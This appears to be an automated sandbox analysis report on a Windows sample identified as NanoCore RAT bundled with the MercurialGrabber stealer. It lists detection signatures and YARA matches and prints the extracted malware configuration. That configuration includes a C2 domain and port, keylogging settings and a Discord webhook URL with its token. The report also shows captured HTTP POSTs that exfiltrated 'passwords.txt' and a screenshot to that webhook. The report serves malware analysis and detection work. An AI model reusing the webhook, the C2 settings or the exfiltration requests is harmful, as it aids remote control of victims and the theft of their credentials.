Windows Analysis Report 4Y85lSOUJ0.exe

Overview

General Information

Sample Name: 4Y85lSOUJ0.exe
Analysis ID: 553230
MD5: 4f439877b84b51b8caa48ae81e1d2363
SHA1: defde1263c0ca2d604226cff86e4045a28650ab4
SHA256: b05b740309562ab6160cc3eb8ed2f0dd839d53c6c71f67bf40aeeb3f580eeb0a
Tags: exe, NanoCore, RAT

Detection

Nanocore MercurialGrabber
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: NanoCore
Yara detected MercurialGrabber
Detected Nanocore Rat
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Yara detected Nanocore RAT
Machine Learning detection for sample
May check the online IP address of the machine
.NET source code contains potential unpacker
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the product ID of Windows
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains capabilities to detect virtual machines
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

Found malware configuration
Source: 00000002.00000002.553881083.00000000042DB000.00000004.00000001.sdmp Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "e5633be0-23ed-438f-a28c-ab363fff", "Group": "Lol ve Valo", "Domain1": "alpay.germanywestcentral.cloudapp.azure.com", "Domain2": "", "Port": 6000, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 4985, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "fcff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "alpay.germanywestcentral.cloudapp.azure.com"}
Source: 5.2.output.exe.300000.0.unpack Malware Configuration Extractor: MercurialGrabber {"Webhook Url": "https://discord.com/api/webhooks/927987281703350292/hNa4BC1580ABvkRj9aSBy9rORGnNfCEHIauFtOCPo1WWv1cprxylpPM2dUs4LrksljK7"}
Multi AV Scanner detection for submitted file
Source: 4Y85lSOUJ0.exe Virustotal: Detection: 73%
Source: 4Y85lSOUJ0.exe ReversingLabs: Detection: 82%
Yara detected MercurialGrabber
Source: Yara match File source: 4Y85lSOUJ0.exe, type: SAMPLE
Source: Yara match File source: 0.2.4Y85lSOUJ0.exe.2de9114.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.4Y85lSOUJ0.exe.69226b.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.4Y85lSOUJ0.exe.2de43ac.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.4Y85lSOUJ0.exe.69226b.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.output.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.4Y85lSOUJ0.exe.2de9114.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.4Y85lSOUJ0.exe.69226b.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.output.exe.300000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.output.exe.300000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.output.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.4Y85lSOUJ0.exe.69226b.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.280292541.0000000000692000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.287619799.0000000002DE1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.301105822.0000000000302000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.285297877.0000000000302000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.285865715.0000000000302000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.285573349.0000000000302000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.286708512.0000000000692000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 4Y85lSOUJ0.exe PID: 6896, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: output.exe PID: 7124, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\output.exe, type: DROPPED
Antivirus / Scanner detection for submitted sample
Source: 4Y85lSOUJ0.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Avira: detection malicious, Label: TR/Dropper.MSIL.Gen7
Source: C:\ProgramData\output.exe Avira: detection malicious, Label: HEUR/AGEN.1137455
Source: C:\ProgramData\nano.exe Avira: detection malicious, Label: TR/Dropper.MSIL.Gen7
Multi AV Scanner detection for dropped file
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Metadefender: Detection: 85%
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe ReversingLabs: Detection: 96%
Source: C:\ProgramData\nano.exe Metadefender: Detection: 85%
Source: C:\ProgramData\nano.exe ReversingLabs: Detection: 96%
Source: C:\ProgramData\output.exe Metadefender: Detection: 51%
Source: C:\ProgramData\output.exe ReversingLabs: Detection: 85%
Yara detected Nanocore RAT
Source: Yara match File source: 4Y85lSOUJ0.exe, type: SAMPLE
Source: Yara match File source: 2.0.nano.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.nano.exe.a80000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.nano.exe.5c40000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.4Y85lSOUJ0.exe.69c870.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.nano.exe.5c40000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.nano.exe.42ee67c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.4Y85lSOUJ0.exe.69c870.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.nano.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.nano.exe.42f2ca5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.4Y85lSOUJ0.exe.69226b.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.4Y85lSOUJ0.exe.3de4268.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.4Y85lSOUJ0.exe.69c870.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.4Y85lSOUJ0.exe.3de4268.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.nano.exe.42e9846.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.nano.exe.5c44629.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.nano.exe.42ee67c.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.nano.exe.a80000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.4Y85lSOUJ0.exe.69c870.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.nano.exe.a80000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.4Y85lSOUJ0.exe.69226b.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.280292541.0000000000692000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.283905085.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.283285603.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.287642993.0000000003DE4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.283614922.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.555253844.0000000005C40000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.553881083.00000000042DB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.282943204.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.549792626.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.286708512.0000000000692000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 4Y85lSOUJ0.exe PID: 6896, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: nano.exe PID: 6968, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\nano.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
Machine Learning detection for sample
Source: 4Y85lSOUJ0.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Joe Sandbox ML: detected
Source: C:\ProgramData\output.exe Joe Sandbox ML: detected
Source: C:\ProgramData\nano.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 2.2.nano.exe.5c40000.7.unpack Avira: Label: TR/NanoCore.fadte
Source: 0.2.4Y85lSOUJ0.exe.690000.0.unpack Avira: Label: TR/Dropper.MSIL.Gen7
Source: 2.0.nano.exe.a80000.2.unpack Avira: Label: TR/Dropper.MSIL.Gen7
Source: 2.2.nano.exe.a80000.0.unpack Avira: Label: TR/Dropper.MSIL.Gen7
Source: 2.0.nano.exe.a80000.3.unpack Avira: Label: TR/Dropper.MSIL.Gen7
Source: 2.0.nano.exe.a80000.0.unpack Avira: Label: TR/Dropper.MSIL.Gen7
Source: 2.0.nano.exe.a80000.1.unpack Avira: Label: TR/Dropper.MSIL.Gen7
Source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack Avira: Label: TR/Dropper.MSIL.Gen7

Compliance:

Uses 32bit PE files
Source: 4Y85lSOUJ0.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 23.128.64.141:443 -> 192.168.2.3:49748 version: TLS 1.0
Source: unknown HTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.3:49750 version: TLS 1.0
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
Source: 4Y85lSOUJ0.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: indows\mscorlib.pdbpdblib.pdb source: nano.exe, 00000002.00000002.552327927.0000000002DF5000.00000004.00000040.sdmp

Networking:

May check the online IP address of the machine
Source: C:\ProgramData\output.exe DNS query: name: ip-api.com
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: alpay.germanywestcentral.cloudapp.azure.com
Source: Malware configuration extractor URLs: https://discord.com/api/webhooks/927987281703350292/hNa4BC1580ABvkRj9aSBy9rORGnNfCEHIauFtOCPo1WWv1cprxylpPM2dUs4LrksljK7
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1
    Host: ip4.seeip.org
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /api/webhooks/927987281703350292/hNa4BC1580ABvkRj9aSBy9rORGnNfCEHIauFtOCPo1WWv1cprxylpPM2dUs4LrksljK7 HTTP/1.1
    Content-Type: application/json
    Host: discord.com
    Content-Length: 448
    Expect: 100-continue
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /api/webhooks/927987281703350292/hNa4BC1580ABvkRj9aSBy9rORGnNfCEHIauFtOCPo1WWv1cprxylpPM2dUs4LrksljK7 HTTP/1.1
    Content-Type: application/json
    Host: discord.com
    Content-Length: 315
    Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /api/webhooks/927987281703350292/hNa4BC1580ABvkRj9aSBy9rORGnNfCEHIauFtOCPo1WWv1cprxylpPM2dUs4LrksljK7 HTTP/1.1
    Content-Type: application/json
    Host: discord.com
    Content-Length: 315
    Expect: 100-continue
Source: global traffic HTTP traffic detected: GET //json/84.17.52.18 HTTP/1.1
    Host: ip-api.com
    Connection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 208.95.112.1
Uses insecure TLS / SSL version for HTTPS connection
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /api/webhooks/927987281703350292/hNa4BC1580ABvkRj9aSBy9rORGnNfCEHIauFtOCPo1WWv1cprxylpPM2dUs4LrksljK7 HTTP/1.1
    Content-Type: multipart/form-data; boundary=----------3cde43b36e5043cd8b731216050e2461
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X x.y; rv:42.0) Gecko/20100101 Firefox/42.0
    Host: discord.com
    Content-Length: 662
    Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /api/webhooks/927987281703350292/hNa4BC1580ABvkRj9aSBy9rORGnNfCEHIauFtOCPo1WWv1cprxylpPM2dUs4LrksljK7 HTTP/1.1
    Content-Type: multipart/form-data; boundary=----------69ea6f20e22e45fdbf9ff26e6e4a8634
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X x.y; rv:42.0) Gecko/20100101 Firefox/42.0
    Host: discord.com
    Content-Length: 106574
    Expect: 100-continue
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: output.exe, 00000005.00000002.303632459.000000001B473000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.
Source: output.exe, 00000005.00000002.303632459.000000001B473000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: output.exe, 00000005.00000002.302801569.000000000262A000.00000004.00000001.sdmp String found in binary or memory: http://discord.com
Source: output.exe, 00000005.00000002.302497941.00000000025CA000.00000004.00000001.sdmp String found in binary or memory: http://ip-api.com
Source: 4Y85lSOUJ0.exe, output.exe.0.dr String found in binary or memory: http://ip-api.com//json/
Source: output.exe, 00000005.00000002.302497941.00000000025CA000.00000004.00000001.sdmp String found in binary or memory: http://ip-api.com//json/84.17.52.18
Source: output.exe, 00000005.00000002.302497941.00000000025CA000.00000004.00000001.sdmp String found in binary or memory: http://ip-api.comx
Source: output.exe, 00000005.00000002.302561397.00000000025EB000.00000004.00000001.sdmp String found in binary or memory: http://ip4.seeip.org
Source: output.exe, 00000005.00000002.302497941.00000000025CA000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: output.exe, 00000005.00000002.302970081.00000000026BB000.00000004.00000001.sdmp, ConDrv.5.dr String found in binary or memory: https://cdn.discordapp.com/attachments/923954670580420641/931537240771944498/passwords.txt
Source: output.exe, 00000005.00000002.303048035.00000000026E6000.00000004.00000001.sdmp, output.exe, 00000005.00000002.302561397.00000000025EB000.00000004.00000001.sdmp, output.exe, 00000005.00000002.302895001.000000000268F000.00000004.00000001.sdmp, ConDrv.5.dr String found in binary or memory: https://cdn.discordapp.com/attachments/923954670580420641/931537246346162207/Capture.jpg
Source: 4Y85lSOUJ0.exe, output.exe.0.dr String found in binary or memory: https://cdn.discordapp.com/avatars/
Source: output.exe, 00000005.00000002.302801569.000000000262A000.00000004.00000001.sdmp String found in binary or memory: https://discord.com
Source: 4Y85lSOUJ0.exe, output.exe.0.dr String found in binary or memory: https://discord.com/api/webhooks/927987281703350292/hNa4BC1580ABvkRj9aSBy9rORGnNfCEHIauFtOCPo1WWv1cp
Source: output.exe, 00000005.00000002.302937012.000000000269F000.00000004.00000001.sdmp, output.exe, 00000005.00000002.303048035.00000000026E6000.00000004.00000001.sdmp, output.exe, 00000005.00000002.302970081.00000000026BB000.00000004.00000001.sdmp String found in binary or memory: https://discord.com8
Source: output.exe, 00000005.00000002.302801569.000000000262A000.00000004.00000001.sdmp String found in binary or memory: https://discord.comx
Source: 4Y85lSOUJ0.exe, output.exe.0.dr String found in binary or memory: https://discordapp.com/api/v8/users/
Source: output.exe.0.dr String found in binary or memory: https://i.imgur.com/vgxBhmx.png
Source: output.exe, 00000005.00000002.302970081.00000000026BB000.00000004.00000001.sdmp String found in binary or memory: https://i.imgur.com/vgxBhmx.pngultipart/form-data
Source: 4Y85lSOUJ0.exe, output.exe.0.dr String found in binary or memory: https://ip4.seeip.org
Source: output.exe, 00000005.00000002.302497941.00000000025CA000.00000004.00000001.sdmp String found in binary or memory: https://ip4.seeip.org/
Source: output.exe, 00000005.00000002.302497941.00000000025CA000.00000004.00000001.sdmp String found in binary or memory: https://ip4.seeip.orgx
Source: output.exe, 00000005.00000002.302970081.00000000026BB000.00000004.00000001.sdmp, ConDrv.5.dr String found in binary or memory: https://media.discordapp.net/attachments/923954670580420641/931537240771944498/passwords.txt
Source: output.exe, 00000005.00000002.303048035.00000000026E6000.00000004.00000001.sdmp, output.exe, 00000005.00000002.302561397.00000000025EB000.00000004.00000001.sdmp, output.exe, 00000005.00000002.302895001.000000000268F000.00000004.00000001.sdmp, ConDrv.5.dr String found in binary or memory: https://media.discordapp.net/attachments/923954670580420641/931537246346162207/Capture.jpg
Source: output.exe, 00000005.00000002.302937012.000000000269F000.00000004.00000001.sdmp, output.exe, 00000005.00000002.303048035.00000000026E6000.00000004.00000001.sdmp, output.exe, 00000005.00000002.302650273.0000000002610000.00000004.00000001.sdmp, output.exe, 00000005.00000002.302902345.0000000002693000.00000004.00000001.sdmp, output.exe, 00000005.00000002.302970081.00000000026BB000.00000004.00000001.sdmp, output.exe, 00000005.00000002.302925247.000000000269B000.00000004.00000001.sdmp String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: 4Y85lSOUJ0.exe, output.exe.0.dr String found in binary or memory: https://www.countryflags.io/
Source: output.exe, 00000005.00000002.302801569.000000000262A000.00000004.00000001.sdmp String found in binary or memory: https://www.countryflags.io/CH/flat/48.png
Source: unknown HTTP traffic detected: POST /api/webhooks/927987281703350292/hNa4BC1580ABvkRj9aSBy9rORGnNfCEHIauFtOCPo1WWv1cprxylpPM2dUs4LrksljK7 HTTP/1.1
    Content-Type: application/json
    Host: discord.com
    Content-Length: 448
    Expect: 100-continue
    Connection: Keep-Alive
Source: unknown DNS traffic detected: queries for: ip4.seeip.org

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)
Source: nano.exe, 00000002.00000002.551067632.000000000122A000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Installs a raw input device (often for capturing keystrokes)
Source: nano.exe, 00000002.00000002.555253844.0000000005C40000.00000004.00020000.sdmp Binary or memory string: RegisterRawInputDevices

E-Banking Fraud:

Yara detected MercurialGrabber
Yara detected Nanocore RAT

System Summary:

Malicious sample detected (through community Yara rule)
Source: 4Y85lSOUJ0.exe, type: SAMPLE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4Y85lSOUJ0.exe, type: SAMPLE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4Y85lSOUJ0.exe, type: SAMPLE Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: 2.0.nano.exe.a80000.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.0.nano.exe.a80000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.0.nano.exe.a80000.1.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.0.nano.exe.a80000.1.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.nano.exe.5720000.5.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.2.nano.exe.5c40000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.4Y85lSOUJ0.exe.2de9114.5.raw.unpack, type: UNPACKEDPE Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: 0.0.4Y85lSOUJ0.exe.69c870.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.0.4Y85lSOUJ0.exe.69c870.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.nano.exe.5c40000.7.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.2.nano.exe.42ee67c.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.4Y85lSOUJ0.exe.2de43ac.4.raw.unpack, type: UNPACKEDPE Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: 5.2.output.exe.300000.0.unpack, type: UNPACKEDPE Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: 0.2.4Y85lSOUJ0.exe.69c870.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.4Y85lSOUJ0.exe.69c870.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.nano.exe.a80000.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.2.nano.exe.a80000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.nano.exe.42f2ca5.4.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.0.4Y85lSOUJ0.exe.69226b.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.0.4Y85lSOUJ0.exe.69226b.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.0.4Y85lSOUJ0.exe.69226b.2.raw.unpack, type: UNPACKEDPE Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: 0.2.4Y85lSOUJ0.exe.3de4268.6.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.4Y85lSOUJ0.exe.3de4268.6.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.nano.exe.32b1744.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.0.output.exe.300000.2.unpack, type: UNPACKEDPE Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: 0.2.4Y85lSOUJ0.exe.69c870.2.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.4Y85lSOUJ0.exe.69c870.2.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.4Y85lSOUJ0.exe.3de4268.6.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.4Y85lSOUJ0.exe.3de4268.6.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.nano.exe.42e9846.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.2.nano.exe.42e9846.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.nano.exe.5c44629.8.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.2.nano.exe.42ee67c.3.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.0.nano.exe.a80000.3.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.0.nano.exe.a80000.3.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: 5.0.output.exe.300000.1.unpack, type: UNPACKEDPE Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: 0.0.4Y85lSOUJ0.exe.69c870.1.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.0.4Y85lSOUJ0.exe.69c870.1.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.0.output.exe.300000.0.unpack, type: UNPACKEDPE Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: 0.2.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.0.nano.exe.a80000.2.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.0.nano.exe.a80000.2.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: 0.2.4Y85lSOUJ0.exe.69226b.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.4Y85lSOUJ0.exe.69226b.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.4Y85lSOUJ0.exe.69226b.1.raw.unpack, type: UNPACKEDPE Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: 00000000.00000000.280292541.0000000000692000.00000002.00020000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000000.280292541.0000000000692000.00000002.00020000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000000.283905085.0000000000A82000.00000002.00020000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
